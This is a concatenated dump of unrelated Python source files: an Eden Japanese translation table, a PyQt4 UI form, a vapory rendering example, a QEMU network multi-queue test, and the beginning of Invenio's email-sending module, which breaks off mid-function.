'You can click on the map to select the Lat/Lon fields. Longitude is West - East (sideways). Latitude is North-South (Up-Down). Latitude is zero on the equator and positive in the northern hemisphere and negative in the southern hemisphere. Longitude is zero on the prime meridian (Greenwich Mean Time) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas. This needs to be added in Decimal Degrees.': '経度/緯度の項目は、地図を選択することでも登録可能です。経度は東西方向(横)の座標軸です。緯度は南北方向(上下)の座標軸です。赤道ではゼロ、北半球ではプラス、南半球ではマイナスとなります。経度は、子午線(グリニッジ標準時)をゼロとして、東(ヨーロッパ、アジア)がプラスとなります。西(大西洋、アメリカ)がマイナスです。10進法で記入してください。',
'You can select the Draw tool (': '選択可能な描画ツール (',
'You can select the Draw tool': 'ドローツールを選択できます',
'You can set the modem settings for SMS here.': 'SMS用モデムの設定をすることができます。',
'You can use the Conversion Tool to convert from either GPS coordinates or Degrees/Minutes/Seconds.': '変換ツールを使うことで、GPS、あるいはDegrees/Minutes/Seconds形式からデータを変換できます。',
'You do no have permission to cancel this received shipment.': '輸送の受け取りをキャンセルする権限がありません',
'You do no have permission to cancel this sent shipment.': '輸送の送付をキャンセルする権限がありません',
'You do no have permission to make this commitment.': 'このコミットを作成する権限がありません',
'You do no have permission to receive this shipment.': 'この輸送を受け取る権限がありません',
'You do no have permission to send this shipment.': 'この輸送を開始する権限がありません',
'You do not have permission for any site to add an inventory item.': 'あなたには他の場所から在庫アイテムを追加する権限はありません',
'You do not have permission for any site to make a commitment.': 'どの場所にも受け入れを示す権限が有りません。',
'You do not have permission for any site to make a request.': '支援要請を作成する権限がありません',
'You do not have permission for any site to perform this action.': 'この操作をするための権限がありません',
'You do not have permission for any site to receive a shipment.': '物資の輸送を受け取る権限がありません',
'You do not have permission for any site to send a shipment.': '物資の輸送をする権限がありません',
'You do not have permission to send a shipment from this site.': 'あなたはこのサイトから物資を送る権限はありません',
'You have a personal map configuration. To change your personal configuration, click ': '個人用地図設定があります。あなたの個人用地図設定を編集するにはクリックしてください',
'You have found a dead body?': '遺体を発見しましたか?',
'You must be logged in to register volunteers.': 'ボランティアとして登録するには、ログインする必要があります',
'You must be logged in to report persons missing or found.': '行方不明者の発見状況を登録するには、ログインする必要があります。',
'You must provide a series id to proceed.': '処理を行うにはシリーズIDを指定する必要があります。',
'You should edit OpenStreetMap settings in models/000_config.py': 'OpenStreetMapの設定を変更するには、models/000_config.pyを編集してください',
'You should edit Twitter settings in models/000_config.py': 'Twitter設定を変更するには、models/000_config.pyを編集してください。',
'Your Account is Approved - you can now login\n %s%s/': '利用者登録が完了しました。リンク先のログインページで あなたが登録したユーザー名とパスワードを入力してログインしてください。\n %s%s/',
'Your Account is Approved': '利用者登録が完了しました',
'Your action is required. Please approve user %s asap: ': 'あなたの行動が要求されています。ただちにユーザー %s を承認してください。',
'Your action is required. Please approve user': 'ユーザーから承認の依頼が届いています。承諾お願いします',
'Your current ordered list of solution items is shown below. You can change it by voting again.': '解決項目の順番付きリストは以下です。再度投票することによって変更可能です。',
'Your post was added successfully.': '投稿が成功しました',
'Your system has been assigned a unique identification (UUID), which other computers around you can use to identify you. To view your UUID, you may go to Synchronization -> Sync Settings. You can also see other settings on that page.': 'あなたがお使いのシステムには、ユニークID (UUID) が割り当てられており、このIDを用いて他のコンピュータがあなたのシステムを同定します。あなたの UUID を閲覧するには、同期 -> 同期設定と進んでください。そのページでは、他の設定を閲覧することもできます。',
'ZIP/Postcode': '郵便番号',
'Zinc roof': 'トタン屋根',
'Zoom In: click in the map or use the left mouse button and drag to create a rectangle': 'ズームイン: マップをクリックするか、拡大したい場所をドラッグで選択してください',
'Zoom Levels': 'ズームレベル',
'Zoom Out: click in the map or use the left mouse button and drag to create a rectangle': 'ズームアウト: マップをクリックするか、拡大したい地点をマウスの左ボタンでドラッグしてください',
'Zoom to Current Location': '現在の場所を拡大',
'Zoom to maximum map extent': 'マップの最大範囲までズーム',
'Zoom': 'ズーム',
'act': '活動',
'active': 'アクティブ',
'added': '追加しました',
'all records': '全てのレコード',
'allows a budget to be developed based on staff & equipment costs, including any admin overheads.': 'では、スタッフや設備、それらの管理コストまで含めた予算編成を行ないます。',
'allows for creation and management of surveys to assess the damage following a natural disaster.': '自然災害による被災影響調査の作成、および管理を許可する',
'an individual/team to do in 1-2 days': '個人やチーム単位で、1-2日中に実施するべき事柄をさします。',
'approved': '承認された',
'assigned': '担当者・部門が確定',
'average': '平均的',
'black': '黒',
'blond': 'ブロンド',
'blue': '青',
'brown': '茶色',
'business_damaged': 'ビジネスへの損害',
'by': ' ',
'c/o Name': 'c/o 名前',
'can be used to extract data from spreadsheets and put them into database tables.': 'スプレッドシートからデータを抽出して、データベーステーブルに挿入できます。',
'can use this to identify the Location': 'ここからロケーションの特定が可能です',
'caucasoid': '白人',
'check all': '全てチェック',
'click for more details': '詳細はクリック',
'collateral event': '付帯イベント',
'completed': '完了',
'confirmed': '確認済',
'consider': '考慮',
'criminal intent': '犯罪目的',
'crud': '性病',
'curly': '縮れ毛',
'currently registered': '登録済み',
'daily': '日次',
'dark': '濃い',
'data uploaded': 'データがアップロードされました',
'database %s select': 'データベース%sの選択',
'database': 'データベース',
'db': 'データベース',
'delete all checked': 'チェックされた項目を全て削除',
'deleted': '削除されました',
'denied': '拒否されました',
'description': '説明',
'design': 'デザイン',
'diseased': '罹患中',
'displaced': '避難中',
'divorced': '離別',
'done!': '完了!',
'duplicate': '重複',
'edit': '編集',
'editor': '編集者',
'eg. gas, electricity, water': 'ガス、電気、水道など',
'embedded': '埋め込まれた',
'enclosed area': '専用地',
'export as csv file': 'csvファイルとしてエクスポート',
'fat': '肥満',
'feedback': '現地からの要望',
'female': '女性',
'final report': '最終報告書',
'flush latrine with septic tank': '浄化槽つき水洗トイレ',
'follow-up assessment': 'アセスメントのフォローアップ',
'food_sources': '食糧供給源',
'forehead': 'ひたい',
'form data': 'フォームデータ',
'from Twitter': 'Twitter経由',
'full': '完全',
'getting': '取得中',
'green': '緑',
'grey': '灰色',
'here': 'ここ',
'high': '高い',
'hourly': '1時間毎',
'households': '世帯情報',
'human error': 'ヒューマンエラー',
'identified': '身元確認済み',
'ignore': '無視する',
'immediately': '即応',
'in Deg Min Sec format': 'Deg Min Sec フォーマットで',
'in GPS format': 'GPS フォーマットで',
'in Inv.': '個',
'inactive': '休止中',
'initial assessment': '初期アセスメント',
'injured': '負傷中',
'insert new %s': '%sの新規挿入',
'insert new': '新規挿入',
'invalid request': '無効な要求',
'invalid': '無効',
'is a central online repository where information on all the disaster victims and families, especially identified casualties, evacuees and displaced people can be stored. Information like name, age, contact number, identity card number, displaced location, and other details are captured. Picture and finger print details of the people can be uploaded to the system. People can also be captured by group for efficiency and convenience.': 'は、災害犠牲者とその家族、特に身元の判明した遺体、避難者、難民など、全ての情報を集約可能な中央オンラインレポジトリです。名前、年齢、連絡先番号、IDカード番号、避難した場所、その他の詳細が記録されます。人物の写真や指紋をアップロードすることができます。効率性と利便性のため、人物をグループ分けすることができます。',
'is envisioned to be composed of several sub-modules that work together to provide complex functionality for the management of relief and project items by an organization. This includes an intake system, a warehouse management system, commodity tracking, supply chain management, fleet management, procurement, financial tracking and other asset and resource management capabilities': 'は、支援団体による救援活動や復興プロジェクトの作業を管理するために、複数のサブモジュールを組み合わせて高度な機能を実現しようと考えており、物資の受け入れ、貯蔵設備の管理、必要な物資の記録、サプライチェーン・マネジメント、輸送管理、調達、財務記録、その他様々な資産やリソースの管理といった機能を備えています',
'keeps track of all incoming tickets allowing them to be categorised & routed to the appropriate place for actioning.': '全ての入荷伝票を追跡することで、カテゴリー分けや適切な実行場所への配分を行う',
'kilogram': 'キログラム',
'kit': 'キット',
'latrines': 'トイレ',
'leave empty to detach account': 'アカウントを取り外すには空欄のままにしてください',
'legend URL': '凡例の URL',
'light': '淡い',
'liter': 'リットル',
'locations': 'ロケーション',
'login': 'ログイン',
'long': '長い',
'long>12cm': '12cm以上',
'low': '低い',
'male': '男性',
'manual': 'マニュアル',
'married': '既婚',
'max': '最大',
'maxExtent': '最大範囲',
'maxResolution': '最高分解能',
'medium': '中',
'medium<12cm': '12cm未満',
'menu item': 'メニューアイテム',
'message_id': 'メッセージID',
'meter cubed': '立方メートル',
'meter': 'メートル',
'meters': 'メートル',
'min': '最小',
'module allows the an inspector to fill information for buildings.': 'モジュールでは、建築物の調査情報を記録できます。',
'module allows the site administrator to configure various options.': 'モジュールを使うことで、サイト管理者が様々な項目を設定する際の手間を省くことができます。',
'module helps monitoring the status of hospitals.': 'モジュールでは、病院の状態をモニタできます。',
'module provides a mechanism to collaboratively provide an overview of the developing disaster, using online mapping (GIS).': 'モジュールでは、オンラインマッピング(GIS)を使用して、現在の災害地域の状態を俯瞰することができます。',
'mongoloid': '黄色人種',
'more': 'その他の項目 ',
'n/a': 'データなし',
'natural hazard': '自然災害',
'negroid': '黒人',
'never': 'まだ',
'new ACL': '新規ACL',
'new record inserted': '新規レコードを挿入しました',
'new': '新規登録',
'next 100 rows': '次の100行',
'no': ' ',
'none': 'なし',
'normal': '通常',
'not accessible - no cached version available!': 'アクセスできません - キャッシュされたバージョンがありません!',
'not accessible - using cached version from': 'アクセス不可 - キャッシュ版を使用しています',
'not specified': '未指定',
'num Zoom Levels': 'ズーム倍率',
'obsolete': '孤立中',
'on': ' ',
'once': '一度',
'open defecation': '野外',
'operational intent': '運用目的',
'or import from csv file': 'またはcsvファイルからインポート',
'other': 'その他',
'over one hour': '1時間以上',
'pack of 10': '10のパック',
'people': '居住者情報',
'piece': 'ピース(単位)',
'pit latrine': '穴掘りトイレ',
'pit': '堀穴',
'postponed': '実施を延期',
'preliminary template or draft, not actionable in its current form': '現行フォーム内で実用的でない予備テンプレートまたはドラフト',
'previous 100 rows': '前の100行',
'primary incident': '優先すべきインシデント',
'problem connecting to twitter.com - please refresh': 'twitter.comへの接続に問題が発生しました。再読込を行ってください',
'provides a catalogue of digital media.': 'デジタルメディアのカタログを提供します',
'record does not exist': 'レコードが存在しません',
'record id': 'レコードID',
'records deleted': 'レコードを削除しました',
'red': '赤い',
'reported': '報告済み',
'reports successfully imported.': 'レポートは正しくインポートできました',
'representation of the Polygon/Line.': 'Polygon/Lineの表現',
'retired': '終了',
'retry': '再試行',
'river': '河川',
'sack 20kg': '袋 20kg',
'sack 50kg': '袋 50kg',
'secondary effect': '副次効果',
'see comment': 'コメント参照',
'selected': '選択された',
'separated from family': '家族とはぐれた',
'separated': '別居',
'shaved': '坊主',
'shift_start': 'シフト開始',
'short': '小柄',
'short<6cm': '6cm未満',
'sides': '側面',
'sign-up now': '今すぐ登録',
'simple': '単純な',
'single': '独身',
'slim': 'やせ型',
'specify': '明記してください',
'staff': 'スタッフ',
'state location': 'ステートロケーション',
'state': '状態',
'straight': '直毛',
'suffered financial losses': '経済的損失',
'table': 'テーブル',
'table_name': 'テーブル名',
'tall': '大柄',
'technical failure': '技術的な原因',
'this': 'この',
'times and it is still not working. We give in. Sorry.': '回繰り返しましたが、処理を完了できません。ご迷惑をおかけしますが、処理を中止します。',
'to access the system': 'してシステムにアクセスしてください',
'ton': 'トン',
'tonsure': '剃髪',
'total': '合計',
'tracks all shelters and stores basic details regarding them. It collaborates with other modules to track people associated with a shelter, the services available etc.': '避難所を追跡し、それらの詳細を蓄積します。避難所に関連付けられた人、利用可能なサービス等の他のモジュールと協業します。',
'tweepy module not available within the running Python - this needs installing for non-Tropo Twitter support!': '実行中のPythonで tweepyモジュールが利用できません。Tropo以外でのTwitter機能利用で必要です',
'unable to parse csv file': 'csvファイルをパースできません。',
'unapproved': '承認されていない',
'uncheck all': 'チェックをすべて外す',
'unidentified': '詳細不明',
'uninhabitable = foundation and structure destroyed': '利用不可能 = 基礎構造や土台部分の破壊など',
'unknown': '不明',
'unspecified': 'その他',
'unverified': '未検証',
'updated': '更新しました',
'updates only': '更新のみ',
'urgent': '緊急',
'using default': '標準値を使用',
'verified': '確認済み',
'volunteer': 'ボランティア',
'wavy': '波状',
'weekly': '週次',
'white': '白',
'wider area, longer term, usually contain multiple Activities': '活動範囲が広く、長期的目標を有しており、複数の支援活動を包括します。',
'widowed': '死別',
'window': '窓',
'windows broken, cracks in walls, roof slightly damaged': '窓破損、壁にひび割れ、屋根の一部損傷',
'within human habitat': '人間の居住地域内',
'xlwt module not available within the running Python - this needs installing for XLS output!': '実行中のPythonでxlwtモジュールが利用できません。XLS出力に必要です。',
'yes': 'はい',
}
|
bobrock/eden
|
languages/ja.py
|
Python
|
mit
| 353,167
|
# -*- coding: utf-8 -*-
from __future__ import print_function
# Form implementation generated from reading ui file './acq4/analysis/old/StdpCtrlTemplate.ui'
#
# Created: Tue Dec 24 01:49:15 2013
# by: PyQt4 UI code generator 4.10
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_StdpCtrlWidget(object):
def setupUi(self, StdpCtrlWidget):
StdpCtrlWidget.setObjectName(_fromUtf8("StdpCtrlWidget"))
StdpCtrlWidget.resize(227, 321)
self.gridLayout = QtGui.QGridLayout(StdpCtrlWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setSpacing(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.label = QtGui.QLabel(StdpCtrlWidget)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.thresholdSpin = QtGui.QDoubleSpinBox(StdpCtrlWidget)
self.thresholdSpin.setObjectName(_fromUtf8("thresholdSpin"))
self.gridLayout.addWidget(self.thresholdSpin, 0, 1, 1, 2)
self.label_2 = QtGui.QLabel(StdpCtrlWidget)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
self.durationSpin = QtGui.QSpinBox(StdpCtrlWidget)
self.durationSpin.setObjectName(_fromUtf8("durationSpin"))
self.gridLayout.addWidget(self.durationSpin, 1, 1, 1, 2)
self.label_4 = QtGui.QLabel(StdpCtrlWidget)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.gridLayout.addWidget(self.label_4, 2, 0, 1, 1)
self.slopeWidthSpin = SpinBox(StdpCtrlWidget)
self.slopeWidthSpin.setObjectName(_fromUtf8("slopeWidthSpin"))
self.gridLayout.addWidget(self.slopeWidthSpin, 2, 1, 1, 2)
self.apExclusionCheck = QtGui.QCheckBox(StdpCtrlWidget)
self.apExclusionCheck.setObjectName(_fromUtf8("apExclusionCheck"))
self.gridLayout.addWidget(self.apExclusionCheck, 3, 0, 1, 1)
self.label_3 = QtGui.QLabel(StdpCtrlWidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.gridLayout.addWidget(self.label_3, 4, 0, 1, 2)
self.apthresholdSpin = QtGui.QDoubleSpinBox(StdpCtrlWidget)
self.apthresholdSpin.setObjectName(_fromUtf8("apthresholdSpin"))
self.gridLayout.addWidget(self.apthresholdSpin, 4, 2, 1, 1)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem, 5, 0, 1, 1)
self.retranslateUi(StdpCtrlWidget)
QtCore.QMetaObject.connectSlotsByName(StdpCtrlWidget)
def retranslateUi(self, StdpCtrlWidget):
StdpCtrlWidget.setWindowTitle(_translate("StdpCtrlWidget", "Form", None))
self.label.setText(_translate("StdpCtrlWidget", "PspThreshold:", None))
self.label_2.setText(_translate("StdpCtrlWidget", "Post-stim Duration (ms):", None))
self.label_4.setText(_translate("StdpCtrlWidget", "Slope width:", None))
self.apExclusionCheck.setText(_translate("StdpCtrlWidget", "Exclude APs", None))
self.label_3.setText(_translate("StdpCtrlWidget", "Exclusion Threshold (mV):", None))
from SpinBox import SpinBox
|
meganbkratz/acq4
|
acq4/analysis/old/StdpCtrlTemplate.py
|
Python
|
mit
| 3,654
|
""" Just a purple sphere """
from vapory import *
objects = [
# SUN
LightSource([1500,2500,-2500], 'color',1),
# SKY
Sphere( [0,0,0],1, 'hollow',
Texture(
Pigment( 'gradient', [0,1,0],
'color_map{[0 color White] [1 color Blue ]}'
'quick_color', 'White'
),
Finish( 'ambient', 1, 'diffuse', 0)
),
'scale', 10000
),
# GROUND
Plane( [0,1,0], 0 ,
Texture( Pigment( 'color', [1.1*e for e in [0.80,0.55,0.35]])),
Normal( 'bumps', 0.75, 'scale', 0.035),
Finish( 'phong', 0.1 )
),
# PAWN
Union( Sphere([0,1,0],0.35),
Cone([0,0,0],0.5,[0,1,0],0.0),
Texture( Pigment( 'color', [1,0.65,0])),
Finish( 'phong', 0.5)
)
]
scene = Scene( Camera( 'ultra_wide_angle',
'angle',45,
'location',[0.0 , 0.6 ,-3.0],
'look_at', [0.0 , 0.6 , 0.0]
),
objects= objects,
included=['colors.inc']
)
scene.render('pawn.png', remove_temp=False)
|
eelcovv/vapory
|
examples/pawn.py
|
Python
|
mit
| 1,312
|
import logging
import re
import aexpect
from autotest.client import utils
from autotest.client.shared import error
from virttest import utils_net
from virttest import utils_test
from virttest import utils_misc
@error.context_aware
def run(test, params, env):
"""
MULTI_QUEUE chang queues number test
1) Boot up VM, and login guest
2) Check guest pci msi support and reset it as expection
3) Enable the queues in guest
4) Run bg_stress_test(pktgen, netperf or file copy) if needed
5) Change queues number repeatly during stress test running
6) Ping external host (local host, if external host not available)
:param test: QEMU test object.
:param params: Dictionary with the test parameters.
:param env: Dictionary with test environment.
"""
def change_queues_number(session, ifname, q_number, queues_status=None):
"""
Change queues number
"""
mq_set_cmd = "ethtool -L %s combined %d" % (ifname, q_number)
if not queues_status:
queues_status = get_queues_status(session, ifname)
if (q_number != queues_status[1] and q_number <= queues_status[0] and
q_number > 0):
expect_status = 0
else:
expect_status = 1
status, output = session.cmd_status_output(mq_set_cmd)
cur_queues_status = get_queues_status(session, ifname)
if status != expect_status:
err_msg = "Change queues number failed, "
err_msg += "current queues set is %s, " % queues_status[1]
err_msg += "max allow queues set is %s, " % queues_status[0]
err_msg += "when run cmd: '%s', " % mq_set_cmd
err_msg += "expect exit status is: %s, " % expect_status
err_msg += "output: '%s'" % output
raise error.TestFail(err_msg)
if not status and cur_queues_status == queues_status:
raise error.TestFail("params is right, but change queues failed")
elif status and cur_queues_status != queues_status:
raise error.TestFail("No need change queues number")
return [int(_) for _ in cur_queues_status]
def get_queues_status(session, ifname, timeout=240):
"""
Get queues status
"""
mq_get_cmd = "ethtool -l %s" % ifname
nic_mq_info = session.cmd_output(mq_get_cmd, timeout=timeout)
queues_reg = re.compile(r"Combined:\s+(\d)", re.I)
queues_info = queues_reg.findall(" ".join(nic_mq_info.splitlines()))
if len(queues_info) != 2:
err_msg = "Oops, get guest queues info failed, "
err_msg += "make sure your guest support MQ.\n"
err_msg += "Check cmd is: '%s', " % mq_get_cmd
err_msg += "Command output is: '%s'." % nic_mq_info
raise error.TestNAError(err_msg)
return [int(x) for x in queues_info]
def enable_multi_queues(vm):
sess = vm.wait_for_serial_login(timeout=login_timeout)
error.context("Enable multi queues in guest.", logging.info)
for nic_index, nic in enumerate(vm.virtnet):
ifname = utils_net.get_linux_ifname(sess, nic.mac)
queues = int(nic.queues)
change_queues_number(sess, ifname, queues)
def ping_test(dest_ip, ping_time, lost_raito, session=None):
status, output = utils_test.ping(dest=dest_ip, timeout=ping_time,
session=session)
packets_lost = utils_test.get_loss_ratio(output)
if packets_lost > lost_raito:
err = " %s%% packages lost during ping. " % packets_lost
err += "Ping command log:\n %s" % "\n".join(output.splitlines()[-3:])
raise error.TestFail(err)
error.context("Init guest and try to login", logging.info)
login_timeout = int(params.get("login_timeout", 360))
bg_stress_test = params.get("run_bgstress")
bg_stress_run_flag = params.get("bg_stress_run_flag")
vm = env.get_vm(params["main_vm"])
vm.verify_alive()
vm.wait_for_login(timeout=login_timeout)
if params.get("pci_nomsi", "no") == "yes":
error.context("Disable pci msi in guest", logging.info)
utils_test.update_boot_option(vm, args_added="pci=nomsi")
vm.wait_for_login(timeout=login_timeout)
enable_multi_queues(vm)
session_serial = vm.wait_for_serial_login(timeout=login_timeout)
s_session = None
bg_ping = params.get("bg_ping")
b_ping_lost_ratio = int(params.get("background_ping_package_lost_ratio", 5))
f_ping_lost_ratio = int(params.get("final_ping_package_lost_ratio", 5))
guest_ip = vm.get_address()
b_ping_time = int(params.get("background_ping_time", 60))
f_ping_time = int(params.get("final_ping_time", 60))
bg_test = None
try:
ifnames = []
for nic_index, nic in enumerate(vm.virtnet):
ifname = utils_net.get_linux_ifname(session_serial,
vm.virtnet[nic_index].mac)
ifnames.append(ifname)
if bg_stress_test:
error.context("Run test %s background" % bg_stress_test,
logging.info)
stress_thread = ""
wait_time = float(params.get("wait_bg_time", 60))
env[bg_stress_run_flag] = False
stress_thread = utils.InterruptedThread(
utils_test.run_virt_sub_test, (test, params, env),
{"sub_type": bg_stress_test})
stress_thread.start()
if bg_stress_run_flag:
utils_misc.wait_for(lambda: env.get(bg_stress_run_flag),
wait_time, 0, 5,
"Wait %s start background" % bg_stress_test)
if bg_ping == "yes":
error.context("Ping guest from host", logging.info)
args = (guest_ip, b_ping_time, b_ping_lost_ratio)
bg_test = utils.InterruptedThread(ping_test, args)
bg_test.start()
error.context("Change queues number repeatly", logging.info)
repeat_counts = int(params.get("repeat_counts", 10))
for nic_index, nic in enumerate(vm.virtnet):
if "virtio" not in nic['nic_model']:
continue
queues = int(vm.virtnet[nic_index].queues)
if queues == 1:
logging.info("Nic with single queue, skip and continue")
continue
ifname = ifnames[nic_index]
default_change_list = xrange(1, int(queues + 1))
change_list = params.get("change_list")
if change_list:
change_list = change_list.split(",")
else:
change_list = default_change_list
for repeat_num in xrange(1, repeat_counts + 1):
error.context("Change queues number -- %sth" % repeat_num,
logging.info)
try:
queues_status = get_queues_status(session_serial, ifname)
for q_number in change_list:
queues_status = change_queues_number(session_serial,
ifname,
int(q_number),
queues_status)
except aexpect.ShellProcessTerminatedError:
vm = env.get_vm(params["main_vm"])
session = vm.wait_for_serial_login(timeout=login_timeout)
session_serial = session
queues_status = get_queues_status(session_serial, ifname)
for q_number in change_list:
queues_status = change_queues_number(session_serial,
ifname,
int(q_number),
queues_status)
if params.get("ping_after_changing_queues", "yes") == "yes":
default_host = "www.redhat.com"
try:
ext_host = utils_net.get_host_default_gateway()
except error.CmdError:
logging.warn("Can't get specified host,"
" Fallback to default host '%s'", default_host)
ext_host = default_host
if not ext_host:
# Fallback to a hardcode host, eg:
ext_host = default_host
s_session = vm.wait_for_login(timeout=login_timeout)
txt = "ping %s after changing queues in guest."
error.context(txt, logging.info)
ping_test(ext_host, f_ping_time, f_ping_lost_ratio, s_session)
if bg_stress_test:
env[bg_stress_run_flag] = False
if stress_thread:
error.context("wait for background test finish", logging.info)
try:
stress_thread.join()
except Exception, err:
err_msg = "Run %s test background error!\n "
err_msg += "Error Info: '%s'"
raise error.TestError(err_msg % (bg_stress_test, err))
finally:
if bg_stress_test:
env[bg_stress_run_flag] = False
if session_serial:
session_serial.close()
if s_session:
s_session.close()
if bg_test:
error.context("Wait for background ping test finish.",
logging.info)
try:
bg_test.join()
except Exception, err:
txt = "Fail to wait background ping test finish. "
txt += "Got error message %s" % err
raise error.TestFail(txt)
|
tolimit/tp-qemu
|
qemu/tests/mq_change_qnum.py
|
Python
|
gpl-2.0
| 9,855
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
Invenio mail sending utilities. send_email() is the main API function
people should be using; just check out its docstring.
"""
__revision__ = "$Id$"
import os
import re
import sys
from cStringIO import StringIO
from time import sleep
import smtplib
import socket
from email import Encoders
from email.Header import Header
from email.MIMEBase import MIMEBase
from email.MIMEImage import MIMEImage
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from email.Utils import formatdate
from formatter import DumbWriter, AbstractFormatter
from invenio.access_control_config import CFG_TEMP_EMAIL_ADDRESS
from invenio.config import \
CFG_SITE_SUPPORT_EMAIL, \
CFG_SITE_URL, \
CFG_SITE_LANG, \
CFG_SITE_NAME_INTL, \
CFG_SITE_NAME, \
CFG_SITE_ADMIN_EMAIL, \
CFG_MISCUTIL_SMTP_HOST, \
CFG_MISCUTIL_SMTP_PORT, \
CFG_VERSION, \
CFG_DEVEL_SITE
from invenio.errorlib import register_exception
from invenio.messages import wash_language, gettext_set_language
from invenio.miscutil_config import InvenioMiscUtilError
from invenio.textutils import guess_minimum_encoding
try:
from invenio.config import \
CFG_MISCUTIL_SMTP_USER,\
CFG_MISCUTIL_SMTP_PASS,\
CFG_MISCUTIL_SMTP_TLS
except ImportError:
CFG_MISCUTIL_SMTP_USER = ''
CFG_MISCUTIL_SMTP_PASS = ''
CFG_MISCUTIL_SMTP_TLS = False
def scheduled_send_email(fromaddr,
toaddr,
subject="",
content="",
header=None,
footer=None,
copy_to_admin=0,
attempt_times=1,
attempt_sleeptime=10,
user=None,
other_bibtasklet_arguments=None,
replytoaddr="",
bccaddr="",
):
"""
Like send_email, but send an email via the bibsched
infrastructure.
@param fromaddr: sender
@type fromaddr: string
@param toaddr: list of receivers
@type toaddr: string (comma separated) or list of strings
@param subject: the subject
@param content: the body of the message
@param header: optional header, otherwise default is used
@param footer: optional footer, otherwise default is used
@param copy_to_admin: set to 1 in order to send email the admins
@param attempt_times: try at least n times before giving up sending
@param attempt_sleeptime: number of seconds to sleep between two attempts
@param user: the user name to user when scheduling the bibtasklet. If
None, the sender will be used
@param other_bibtasklet_arguments: other arguments to append to the list
of arguments to the call of task_low_level_submission
@param replytoaddr: [string or list-of-strings] to be used for the
reply-to header of the email (if string, then
receivers are separated by ',')
@param bccaddr: [string or list-of-strings] to be used for BCC header of the email
(if string, then receivers are separated by ',')
@return: the scheduled bibtasklet
"""
from invenio.bibtask import task_low_level_submission
if not isinstance(toaddr, (unicode, str)):
toaddr = ','.join(toaddr)
if not isinstance(replytoaddr, (unicode, str)):
replytoaddr = ','.join(replytoaddr)
toaddr = remove_temporary_emails(toaddr)
if user is None:
user = fromaddr
if other_bibtasklet_arguments is None:
other_bibtasklet_arguments = []
else:
other_bibtasklet_arguments = list(other_bibtasklet_arguments)
if not header is None:
other_bibtasklet_arguments.extend(("-a", "header=%s" % header))
if not footer is None:
other_bibtasklet_arguments.extend(("-a", "footer=%s" % footer))
return task_low_level_submission(
"bibtasklet", user, "-T", "bst_send_email",
"-a", "fromaddr=%s" % fromaddr,
"-a", "toaddr=%s" % toaddr,
"-a", "replytoaddr=%s" % replytoaddr,
"-a", "subject=%s" % subject,
"-a", "content=%s" % content,
"-a", "copy_to_admin=%s" % copy_to_admin,
"-a", "attempt_times=%s" % attempt_times,
"-a", "attempt_sleeptime=%s" % attempt_sleeptime,
"-a", "bccaddr=%s" % bccaddr,
*other_bibtasklet_arguments)
def send_email(fromaddr,
toaddr,
subject="",
content="",
html_content='',
html_images=None,
header=None,
footer=None,
html_header=None,
html_footer=None,
copy_to_admin=0,
attempt_times=1,
attempt_sleeptime=10,
debug_level=0,
ln=CFG_SITE_LANG,
charset=None,
replytoaddr="",
attachments=None,
bccaddr="",
forward_failures_to_admin=True,
):
"""Send a forged email to TOADDR from FROMADDR with message created from subjet, content and possibly
header and footer.
@param fromaddr: [string] sender
@param toaddr: [string or list-of-strings] list of receivers (if string, then
receivers are separated by ','). BEWARE: If more than once receiptiant is given,
the receivers are put in BCC and To will be "Undisclosed.Recipients:".
@param subject: [string] subject of the email
@param content: [string] content of the email
@param html_content: [string] html version of the email
@param html_images: [dict] dictionary of image id, image path
@param header: [string] header to add, None for the Default
@param footer: [string] footer to add, None for the Default
@param html_header: [string] header to add to the html part, None for the Default
@param html_footer: [string] footer to add to the html part, None for the Default
@param copy_to_admin: [int] if 1 add CFG_SITE_ADMIN_EMAIL in receivers
@param attempt_times: [int] number of tries
@param attempt_sleeptime: [int] seconds in between tries
@param debug_level: [int] debug level
@param ln: [string] invenio language
@param charset: [string] the content charset. By default is None which means
to try to encode the email as ascii, then latin1 then utf-8.
@param replytoaddr: [string or list-of-strings] to be used for the
reply-to header of the email (if string, then
receivers are separated by ',')
@param attachments: list of paths of files to be attached. Alternatively,
every element of the list could be a tuple: (filename, mimetype)
@param bccaddr: [string or list-of-strings] to be used for BCC header of the email
(if string, then receivers are separated by ',')
@param forward_failures_to_admin: [bool] prevents infinite recursion
in case of admin reporting,
when the problem is not in
the e-mail address format,
but rather in the network
If sending fails, try to send it ATTEMPT_TIMES, and wait for
ATTEMPT_SLEEPTIME seconds in between tries.
e.g.:
send_email('foo.bar@cern.ch', 'bar.foo@cern.ch', 'Let\'s try!'', 'check 1234', '<strong>check</strong> <em>1234</em><img src="cid:image1">', {'image1': '/tmp/quantum.jpg'})
@return: [bool]: True if email was sent okay, False if it was not.
"""
if html_images is None:
html_images = {}
if type(toaddr) is str:
toaddr = toaddr.strip().split(',')
